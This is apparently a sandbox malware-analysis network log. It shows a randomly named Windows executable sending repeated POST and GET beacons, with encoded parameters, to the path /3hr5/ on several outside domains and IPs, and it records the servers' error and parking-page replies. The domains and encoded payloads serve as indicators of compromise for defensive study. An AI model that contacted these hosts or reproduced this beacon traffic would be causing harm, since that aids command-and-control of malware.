                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              23 | 192.168.11.20 | 50154 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:12.975311995 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rtptornado4dnihboss.com
                                                                                                                              Referer: http://www.rtptornado4dnihboss.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:13.142080069 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:24:13.142205000 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:24:13.142210960 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:13 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
                                                                                                                              Dec 4, 2023 15:24:13.142396927 CET | 7770 | OUT
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET | 5198 | OUT


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              24 | 192.168.11.20 | 50155 | 198.252.98.64 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:15.660726070 CET | 541 | OUT | GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:15.828353882 CET | 999 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:24:15 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              25 | 192.168.11.20 | 50156 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:21.233376980 CET | 810 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=pua0tTD0XFePBgazk9wug9yt189cnqMxpZzgZ+jbfBM/XlRjbbJUFTbKiPFr0/RgqbhUYOHcWvY2cETr6xznsauqvL2f1ubad5ckxsIHM3aduzOblAhsW/jldATtGGKFT5MoPDqzh5UGxLrypX02NNIUJsDZfn5FUH0FfO66xGtE6xKIHQ==
                                                                                                                              Dec 4, 2023 15:24:21.417294979 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:21 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              26 | 192.168.11.20 | 50157 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:23.940310001 CET | 1150 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:24.122899055 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:24 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              27 | 192.168.11.20 | 50158 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:26.644640923 CET | 6484 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:26.644727945 CET | 6484 | OUT
                                                                                                                              Dec 4, 2023 15:24:26.827408075 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:24:26.827753067 CET | 1340 | OUT
                                                                                                                              Dec 4, 2023 15:24:26.827861071 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:26 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 50159 | 91.195.240.117 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:29.345392942 CET | 533 | OUT | GET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:24:29.579713106 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:24:29 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:24:29 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-xqxcz
                                                                                                                              server: NginX
                                                                                                                              connection: close
Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_nzshTYzreklKPSwZ6nwPWlmXy8J2H8rwO3/YgFGxxcZLT94PHxihoa2a4iwu/VzanAuVhUhltkGELOklLD9C8w==><head><meta charset="utf-8"><title>slimnthinau.com&nbsp;-&nbsp;slimnthinau Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="slimnthinau.com is your first and best source for all of the information you’re looking for. From


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 50160 | 104.232.106.165 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:35.373198986 CET | 795 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=fIa3UTZ3x6qNSxbZZ3MAoOadVKgtXFBaYelZtptno9OnqAyuYqoYgrjU656glBgWWBL52r0zAspRL+st7W39OlAo75Xmdla5hcDcIM6jF338x9MfF7F0Ds32oFDacjLWBLUjsPwYgANzLtbDXdhdfup4xsNhNj9N4bA764E/MZnZtGezuA==
Dec 4, 2023 15:24:35.538484097 CET | 452 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 50161 | 104.232.106.165 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:38.061120987 CET | 1135 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:24:38.226319075 CET | 452 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:59 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              31 | 192.168.11.20 | 50162 | 104.232.106.165 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:40.749059916 CET | 1340 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.080869.com
                                                                                                                              Referer: http://www.080869.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:40.914653063 CET | 452 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:02 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              32 | 192.168.11.20 | 50163 | 104.232.106.165 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:43.434988022 CET | 528 | OUT | GET /3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:43.600462914 CET | 570 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:04 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              33 | 192.168.11.20 | 50164 | 89.31.143.90 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:48.913009882 CET | 834 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.eigenheimstattmiete.com
                                                                                                                              Referer: http://www.eigenheimstattmiete.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=rK9rAUxxlGjHinSs9vDPgXvIf3wTjjaWkZTMGGP7KONDLuANVMPiAq0Gs7ZneQGY2YLcj2GT8U5QZejyf2hQk88ZcejOKjwCFPsW1UlDzIqhnxIjO23crCAaoPfCKww7PIZLGPV4SVISJGyd3m4g9T+OBnk1WmaLTz1wZHANDupmK49vlA==
                                                                                                                              Dec 4, 2023 15:24:49.093534946 CET | 387 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:49 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 154
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Allow: GET, POST, HEAD
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              34 | 192.168.11.20 | 50165 | 89.31.143.90 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:24:51.619982958 CET | 1174 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.eigenheimstattmiete.com
                                                                                                                              Referer: http://www.eigenheimstattmiete.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:51.800884962 CET | 387 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:51 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 154
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Allow: GET, POST, HEAD
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 50166 | 89.31.143.90 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:54.325870037 CET | 3912 | OUT | POST /3hr5/ HTTP/1.1
Host: www.eigenheimstattmiete.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.eigenheimstattmiete.com
Referer: http://www.eigenheimstattmiete.com/3hr5/
Connection: close
Content-Length: 52912
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:24:54.506891012 CET | 387 | IN | HTTP/1.1 405 Not Allowed
Date: Mon, 04 Dec 2023 14:24:54 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Server: UD Webspace 3.2
Allow: GET, POST, HEAD
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 50167 | 89.31.143.90 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:24:57.024666071 CET | 541 | OUT | GET /3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38 HTTP/1.1
Host: www.eigenheimstattmiete.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:24:57.205205917 CET | 213 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Dec 2023 14:24:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Server: UD Webspace 3.2
Data Raw: 31 39 65 30 0d 0a
Data Ascii: 19e0
Dec 4, 2023 15:24:57.205296993 CET | 1340 | IN |
Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
Dec 4, 2023 15:24:57.205750942 CET | 1340 | IN |
Data Ascii: lt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem
Dec 4, 2023 15:24:57.205806971 CET | 255 | IN |
Data Ascii: w noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 50168 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:02.576416016 CET | 810 | OUT | POST /3hr5/ HTTP/1.1
Host: www.neuvillette.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.neuvillette.org
Referer: http://www.neuvillette.org/3hr5/
Connection: close
Content-Length: 184
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
